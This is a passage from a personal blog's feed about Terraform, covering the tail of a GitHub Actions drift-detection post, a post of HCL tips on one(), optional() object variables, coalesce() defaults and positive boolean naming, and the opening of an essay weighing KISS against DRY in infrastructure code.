                <span class="s">labels: ['terraform', 'drift-detection', 'needs-review']</span>
              <span class="s">});</span>

              <span class="s">console.log(`Created new issue #${newIssue.data.number}`);</span>
            <span class="s">}</span>
</code></pre></div></div>

<h2 id="key-benefits">Key Benefits</h2>

<p>This approach provides several engineering advantages:</p>

<ul>
  <li><strong>Zero External Dependencies</strong>: No third-party SaaS tools or agents required</li>
  <li><strong>Native Exit Code Logic</strong>: Leverages Terraform’s <code class="language-plaintext highlighter-rouge">detailed-exitcode</code> for precise drift detection</li>
  <li><strong>Parallel Execution</strong>: Matrix strategy enables concurrent checks across multiple environments</li>
  <li><strong>Audit Trail</strong>: GitHub issues provide timestamped drift history and workflow run links</li>
  <li><strong>Secure Authentication</strong>: OIDC eliminates static credential management</li>
  <li><strong>Cost Effective</strong>: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)</li>
</ul>

<p>The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.</p>

<h2 id="considerations-for-production-use">Considerations for Production Use</h2>

<p>While this workflow provides solid drift detection, you may want to enhance it for production environments:</p>

<ul>
  <li><strong>Multi-Account Support</strong>: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure</li>
  <li><strong>Sensitive Data Handling</strong>: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration</li>
  <li><strong>Issue Lifecycle Management</strong>: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes</li>
  <li><strong>State Lock Handling</strong>: The <code class="language-plaintext highlighter-rouge">-lock-timeout=5m</code> provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications</li>
  <li><strong>Error Notification</strong>: Consider adding Slack/email notifications for plan failures in addition to GitHub issues</li>
</ul>

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="terraform" /><category term="iac" /><category term="infrastructure" /><category term="devops" /><category term="engineering" /><summary type="html"><![CDATA[TL;DR Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.]]></summary></entry><entry><title type="html">Terraform Tips from the IaC Trenches</title><link href="https://rosesecurity.cloud/2025/12/04/terraform-tips-and-tricks.html" rel="alternate" type="text/html" title="Terraform Tips from the IaC Trenches" /><published>2025-12-04T00:00:00+00:00</published><updated>2025-12-04T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/12/04/terraform-tips-and-tricks</id><content type="html" xml:base="https://rosesecurity.cloud/2025/12/04/terraform-tips-and-tricks.html"><![CDATA[<p>After a few years of writing open-source Terraform modules, I’ve picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren’t revolutionary, but they’re simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I’ve seen in the wild, these techniques seem to be underutilized.</p>

<hr />

<h2 id="use-one-for-safer-conditional-resource-references">Use <code class="language-plaintext highlighter-rouge">one()</code> for Safer Conditional Resource References</h2>

<p>When you conditionally create resources with <code class="language-plaintext highlighter-rouge">count</code>, don’t reach for <code class="language-plaintext highlighter-rouge">[0]</code> — use <code class="language-plaintext highlighter-rouge">one()</code>.</p>

<h3 id="the-problem">The Problem</h3>

<p>It’s common to use <code class="language-plaintext highlighter-rouge">count</code> with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">data</span> <span class="s2">"aws_route53_zone"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">create_dns</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>
  <span class="nx">name</span>  <span class="o">=</span> <span class="s2">"rosesecurity.dev"</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">aws_route53_zone</span><span class="p">.</span><span class="nx">this</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">zone_id</span>  <span class="c1"># ❌ Dangerous</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"blog.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"A"</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This looks fine and might even work in <code class="language-plaintext highlighter-rouge">dev</code> environments where <code class="language-plaintext highlighter-rouge">var.create_dns = true</code>. But the moment that variable is <code class="language-plaintext highlighter-rouge">false</code> in another environment, you get:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.
</code></pre></div></div>

<p>The issue? <strong>This fails at runtime, not plan time.</strong> The code works when the resource exists and breaks when it doesn’t.</p>

<h3 id="the-solution">The Solution</h3>

<p>Use <code class="language-plaintext highlighter-rouge">one()</code> with the <code class="language-plaintext highlighter-rouge">[*]</code> splat operator:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">data</span> <span class="s2">"aws_route53_zone"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">create_dns</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>
  <span class="nx">name</span>  <span class="o">=</span> <span class="s2">"rosesecurity.dev"</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">one</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">aws_route53_zone</span><span class="p">.</span><span class="nx">this</span><span class="p">[*].</span><span class="nx">zone_id</span><span class="p">)</span>  <span class="c1"># ✅ Safe(r)</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"blog.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"A"</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">one()</code> function (available in Terraform v0.15+) is designed for this exact pattern:</p>

<ul>
  <li><strong>If count = 0</strong>: Returns <code class="language-plaintext highlighter-rouge">null</code> gracefully instead of crashing</li>
  <li><strong>If count = 1</strong>: Returns the element’s value</li>
  <li><strong>If count ≥ 2</strong>: Returns an error (catches your mistake early)</li>
</ul>

<p><strong>When you use <code class="language-plaintext highlighter-rouge">[0]</code>, you’re assuming the resource exists. When you use <code class="language-plaintext highlighter-rouge">one()</code>, you’re validating it exists.</strong></p>

<p>Bonus: <code class="language-plaintext highlighter-rouge">one()</code> also works with sets, which don’t support index notation at all. Using <code class="language-plaintext highlighter-rouge">one()</code> makes the code more versatile and future-proof.</p>

<hr />

<h2 id="design-better-module-variables-with-objects-optional-and-coalesce">Design Better Module Variables with Objects, <code class="language-plaintext highlighter-rouge">optional()</code>, and <code class="language-plaintext highlighter-rouge">coalesce()</code></h2>

<p>When building reusable Terraform modules, variable design makes the difference between a module that’s fun to use and one that’s a configuration nightmare. Here’s a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.</p>

<h3 id="the-problem-scattered-variables">The Problem: Scattered Variables</h3>

<p>Most modules start simple and grow organically, leading to an explosion of individual variables:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ❌ Scattered variables - hard to manage and document</span>
<span class="nx">variable</span> <span class="s2">"elasticsearch_subdomain_name"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">string</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"The name of the subdomain for Elasticsearch"</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"elasticsearch_port"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">number</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Port for Elasticsearch"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="mi">9200</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"elasticsearch_enable_ssl"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Enable SSL for Elasticsearch"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">true</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_subdomain_name"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">string</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"The name of the subdomain for Kibana"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">null</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_port"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">number</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Port for Kibana"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="mi">5601</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_enable_ssl"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Enable SSL for Kibana"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">true</span>
<span class="p">}</span>

<span class="c1"># ... and on and on for 12+ more variables</span>
</code></pre></div></div>

<p>This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.</p>

<h3 id="the-solution-group-related-variables-into-objects">The Solution: Group Related Variables into Objects</h3>

<p>Use objects with the <code class="language-plaintext highlighter-rouge">optional()</code> function to group logically related settings:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ✅ Grouped by logical component</span>
<span class="nx">variable</span> <span class="s2">"elasticsearch_settings"</span> <span class="p">{</span>
  <span class="nx">type</span> <span class="o">=</span> <span class="nx">object</span><span class="p">({</span>
    <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span>
    <span class="nx">port</span>           <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">number</span><span class="p">,</span> <span class="mi">9200</span><span class="p">)</span>
    <span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">bool</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
  <span class="p">})</span>

  <span class="nx">description</span> <span class="o">=</span> <span class="o">&lt;&lt;-</span><span class="nx">DOC</span>
    <span class="nx">Configuration</span> <span class="nx">settings</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">service</span><span class="err">.</span>

    <span class="nx">subdomain_name</span><span class="o">:</span> <span class="nx">The</span> <span class="nx">name</span> <span class="nx">of</span> <span class="nx">the</span> <span class="nx">subdomain</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">in</span> <span class="nx">the</span> <span class="nx">DNS</span> <span class="nx">zone</span> <span class="err">(</span><span class="nx">e</span><span class="err">.</span><span class="nx">g</span><span class="p">.,</span> <span class="s1">'elasticsearch'</span><span class="p">,</span> <span class="s1">'search'</span><span class="p">).</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="nx">environment</span> <span class="nx">name</span><span class="p">.</span>
    <span class="nx">port</span><span class="o">:</span> <span class="nx">Port</span> <span class="nx">number</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span><span class="p">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="mi">9200</span><span class="p">.</span>
    <span class="nx">enable_ssl</span><span class="o">:</span> <span class="nx">Enable</span> <span class="nx">SSL</span><span class="o">/</span><span class="nx">TLS</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="kc">true</span><span class="p">.</span>
  <span class="nx">DOC</span>
  <span class="nx">default</span> <span class="o">=</span> <span class="p">{}</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_settings"</span> <span class="p">{</span>
  <span class="nx">type</span> <span class="o">=</span> <span class="nx">object</span><span class="p">({</span>
    <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span>
    <span class="nx">port</span>           <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">number</span><span class="p">,</span> <span class="mi">5601</span><span class="p">)</span>
    <span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">bool</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
  <span class="p">})</span>

  <span class="nx">description</span> <span class="o">=</span> <span class="o">&lt;&lt;-</span><span class="nx">DOC</span>
    <span class="nx">Configuration</span> <span class="nx">settings</span> <span class="nx">for</span> <span class="nx">Kibana</span> <span class="nx">service</span><span class="err">.</span>

    <span class="nx">subdomain_name</span><span class="o">:</span> <span class="nx">The</span> <span class="nx">name</span> <span class="nx">of</span> <span class="nx">the</span> <span class="nx">subdomain</span> <span class="nx">for</span> <span class="nx">Kibana</span> <span class="nx">in</span> <span class="nx">the</span> <span class="nx">DNS</span> <span class="nx">zone</span> <span class="err">(</span><span class="nx">e</span><span class="err">.</span><span class="nx">g</span><span class="p">.,</span> <span class="s1">'kibana'</span><span class="p">,</span> <span class="s1">'ui'</span><span class="p">).</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="nx">environment</span> <span class="nx">name</span><span class="p">.</span>
    <span class="nx">port</span><span class="o">:</span> <span class="nx">Port</span> <span class="nx">number</span> <span class="nx">for</span> <span class="nx">Kibana</span><span class="p">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="mi">5601</span><span class="p">.</span>
    <span class="nx">enable_ssl</span><span class="o">:</span> <span class="nx">Enable</span> <span class="nx">SSL</span><span class="o">/</span><span class="nx">TLS</span> <span class="nx">for</span> <span class="nx">Kibana</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="kc">true</span><span class="p">.</span>
  <span class="nx">DOC</span>
  <span class="nx">default</span> <span class="o">=</span> <span class="p">{}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">optional()</code> function (Terraform v1.3+) lets you define object attributes that users can omit:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">subdomain_name</span> <span class="o">=</span> <span class="nx">optional</span><span class="err">(</span><span class="nx">string</span><span class="err">)</span>        <span class="c1"># Can be omitted, defaults to null</span>
<span class="nx">port</span>           <span class="o">=</span> <span class="nx">optional</span><span class="err">(</span><span class="nx">number</span><span class="err">,</span> <span class="mi">9200</span><span class="err">)</span>  <span class="c1"># Can be omitted, defaults to 9200</span>
<span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="nx">optional</span><span class="err">(</span><span class="nx">bool</span><span class="err">,</span> <span class="kc">true</span><span class="err">)</span>    <span class="c1"># Can be omitted, defaults to true</span>
</code></pre></div></div>

<p>This means users can provide as much or as little configuration as they need:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Minimal - just override subdomain</span>
<span class="nx">elasticsearch</span> <span class="o">=</span> <span class="p">{</span>
  <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="s2">"search"</span>
  <span class="c1"># port and enable_ssl use defaults</span>
<span class="p">}</span>

<span class="c1"># Or provide nothing, use all defaults</span>
<span class="nx">elasticsearch</span> <span class="o">=</span> <span class="p">{}</span>

<span class="c1"># Or customize everything</span>
<span class="nx">elasticsearch</span> <span class="o">=</span> <span class="p">{</span>
  <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="s2">"es-prod"</span>
  <span class="nx">port</span>           <span class="o">=</span> <span class="mi">9300</span>
  <span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="kc">false</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="heredoc-syntax-for-documentation">HEREDOC Syntax for Documentation</h3>

<p>Use <strong>indented HEREDOC</strong> (<code class="language-plaintext highlighter-rouge">&lt;&lt;-DOC</code>) to document complex object variables:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">description</span> <span class="o">=</span> <span class="o">&lt;&lt;-</span><span class="nx">DOC</span>
  <span class="nx">Configuration</span> <span class="nx">settings</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">service</span><span class="err">.</span>

  <span class="nx">subdomain_name</span><span class="o">:</span> <span class="nx">The</span> <span class="nx">name</span> <span class="nx">of</span> <span class="nx">the</span> <span class="nx">subdomain</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">in</span> <span class="nx">DNS</span><span class="err">.</span>
  <span class="nx">port</span><span class="o">:</span> <span class="nx">Port</span> <span class="nx">number</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="mi">9200</span><span class="err">.</span>
  <span class="nx">enable_ssl</span><span class="o">:</span> <span class="nx">Enable</span> <span class="nx">SSL</span><span class="o">/</span><span class="nx">TLS</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="kc">true</span><span class="err">.</span>
<span class="nx">DOC</span>
</code></pre></div></div>

<p><strong>Why the dash matters:</strong></p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt;&lt;-DOC</code> (with dash): Automatically strips leading whitespace, allowing proper indentation</li>
  <li><code class="language-plaintext highlighter-rouge">&lt;&lt;DOC</code> (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting</li>
</ul>

<p>The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.</p>

<h3 id="smart-defaults-with-coalesce-and-context">Smart Defaults with <code class="language-plaintext highlighter-rouge">coalesce()</code> and Context</h3>

<p>Combine objects with the <a href="https://github.com/cloudposse/terraform-null-label">Terraform null label pattern</a> (context.tf) to provide intelligent defaults:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Use locals to apply coalesce logic</span>
<span class="nx">locals</span> <span class="p">{</span>
  <span class="nx">elasticsearch_subdomain</span> <span class="o">=</span> <span class="nx">coalesce</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">elasticsearch</span><span class="p">.</span><span class="nx">subdomain_name</span><span class="p">,</span> <span class="nx">module</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">environment</span><span class="p">)</span>
  <span class="nx">kibana_subdomain</span>        <span class="o">=</span> <span class="nx">coalesce</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">kibana</span><span class="p">.</span><span class="nx">subdomain_name</span><span class="p">,</span> <span class="nx">module</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">environment</span><span class="p">)</span>
<span class="p">}</span>

<span class="c1"># Resources reference the locals</span>
<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"elasticsearch"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">zone_id</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"${local.elasticsearch_subdomain}.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"CNAME"</span>
  <span class="nx">records</span> <span class="o">=</span> <span class="p">[</span><span class="nx">aws_elasticsearch_domain</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">endpoint</span><span class="p">]</span>
  <span class="nx">ttl</span>     <span class="o">=</span> <span class="mi">300</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"kibana"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">zone_id</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"${local.kibana_subdomain}.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"CNAME"</span>
  <span class="nx">records</span> <span class="o">=</span> <span class="p">[</span><span class="nx">aws_elasticsearch_domain</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">kibana_endpoint</span><span class="p">]</span>
  <span class="nx">ttl</span>     <span class="o">=</span> <span class="mi">300</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">coalesce()</code> function returns the first non-null value, giving you:</p>

<p><strong>Without user input</strong> (in “prod” environment):</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">elasticsearch.prod.rosesecurity.dev</code></li>
  <li><code class="language-plaintext highlighter-rouge">kibana.prod.rosesecurity.dev</code></li>
</ul>

<p><strong>With user override:</strong></p>
<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">elasticsearch</span> <span class="o">=</span> <span class="p">{</span>
  <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="s2">"search"</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Results in: <code class="language-plaintext highlighter-rouge">search.prod.rosesecurity.dev</code></p>

<p><strong>Let users configure only what matters, default the rest.</strong></p>

<p>Group related variables into objects, use <code class="language-plaintext highlighter-rouge">optional()</code> for flexibility, document with indented HEREDOCs, and combine with <code class="language-plaintext highlighter-rouge">coalesce()</code> for intelligent defaults. Your module users will thank you.</p>

<hr />

<h2 id="avoid-double-negatives-in-variable-names">Avoid Double Negatives in Variable Names</h2>

<p>Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.</p>

<h3 id="the-problem-1">The Problem</h3>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ❌ Negative variable name</span>
<span class="nx">variable</span> <span class="s2">"disable_encryption"</span> <span class="p">{</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Disable encryption"</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">false</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_s3_bucket_server_side_encryption_configuration"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span>  <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">disable_encryption</span> <span class="o">?</span> <span class="mi">0</span> <span class="o">:</span> <span class="mi">1</span>
  <span class="nx">bucket</span> <span class="o">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">count</code> line requires mental translation: “If <code class="language-plaintext highlighter-rouge">disable_encryption</code> is <code class="language-plaintext highlighter-rouge">false</code>, then <code class="language-plaintext highlighter-rouge">count</code> is <code class="language-plaintext highlighter-rouge">1</code>, so encryption is enabled.” That’s a double negative in what should be straightforward logic.</p>

<p>This pattern creates real problems during code review. A change from <code class="language-plaintext highlighter-rouge">default = false</code> to <code class="language-plaintext highlighter-rouge">default = true</code> looks like it’s “enabling” something when it’s actually doing the opposite.</p>

<h3 id="the-solution-1">The Solution</h3>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ✅ Positive variable name</span>
<span class="nx">variable</span> <span class="s2">"encryption_enabled"</span> <span class="p">{</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Enable encryption"</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">true</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_s3_bucket_server_side_encryption_configuration"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span>  <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">encryption_enabled</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>
  <span class="nx">bucket</span> <span class="o">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The logic now reads directly: “If <code class="language-plaintext highlighter-rouge">encryption_enabled</code> is <code class="language-plaintext highlighter-rouge">true</code>, create the encryption config.”</p>

<p>Positive naming also makes security choices more explicit. Setting <code class="language-plaintext highlighter-rouge">encryption_enabled = false</code> is visually clearer than <code class="language-plaintext highlighter-rouge">disable_encryption = true</code>, even though they’re functionally equivalent.</p>

<p><strong>Name variables for what they enable, not what they prevent.</strong></p>

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="terraform" /><category term="iac" /><category term="infrastructure" /><category term="best-practices" /><category term="devops" /><summary type="html"><![CDATA[After a few years of writing open-source Terraform modules, I’ve picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren’t revolutionary, but they’re simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I’ve seen in the wild, these techniques seem to be underutilized.]]></summary></entry><entry><title type="html">KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever</title><link href="https://rosesecurity.cloud/2025/11/14/kiss-versus-dry-iac.html" rel="alternate" type="text/html" title="KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever" /><published>2025-11-14T00:00:00+00:00</published><updated>2025-11-14T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/11/14/kiss-versus-dry-iac</id><content type="html" xml:base="https://rosesecurity.cloud/2025/11/14/kiss-versus-dry-iac.html"><![CDATA[<h2 id="the-scale-gap-problem">The Scale Gap Problem</h2>

<p>Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.</p>

<p>Then you get to your actual production environment, and everything changes.</p>

<p>You’re not starting from scratch with a blank AWS account. You’ve got existing resources that were manually created two years ago by someone who left the company. There’s brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what’s actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.</p>

<p>Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You’re not just writing infrastructure code anymore. You’re trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.</p>

<p>This is the scale gap, and it’s where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.</p>

<h2 id="the-dry-revolution-solving-yesterdays-problems">The DRY Revolution: Solving Yesterday’s Problems</h2>

<p>When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don’t Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.</p>

<p>Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented “best practices,” not necessarily because they had the specific problems these tools were designed to solve.</p>

<p>The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.</p>

<p>Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, for_each, improved module capabilities, and other features designed to support DRY principles natively.</p>

<p>On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.</p>

<h2 id="the-hidden-costs-of-going-dry">The Hidden Costs of Going DRY</h2>

<h3 id="when-abstractions-break-troubleshooting-becomes-archaeological">When Abstractions Break, Troubleshooting Becomes Archaeological</h3>

<p>It’s 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.</p>

<p>With a DRY setup using Terragrunt and hierarchical inheritance, you’re not just reading Terraform code. You’re tracing values through multiple layers: the root <code class="language-plaintext highlighter-rouge">terragrunt.hcl</code> with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.</p>

<p>Where did that database configuration value actually come from? The global config? The environment override? A module default? You’re playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.</p>

<p>The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.</p>

<h3 id="the-onboarding-cliff">The Onboarding Cliff</h3>

<p>It’s a new team member’s first day and they need to update a security group rule in the staging environment. Simple enough, right?</p>

<p>With DRY abstraction tooling, they need to learn Terraform itself, your module library’s conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.</p>

<p>That’s not onboarding, that’s an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.</p>

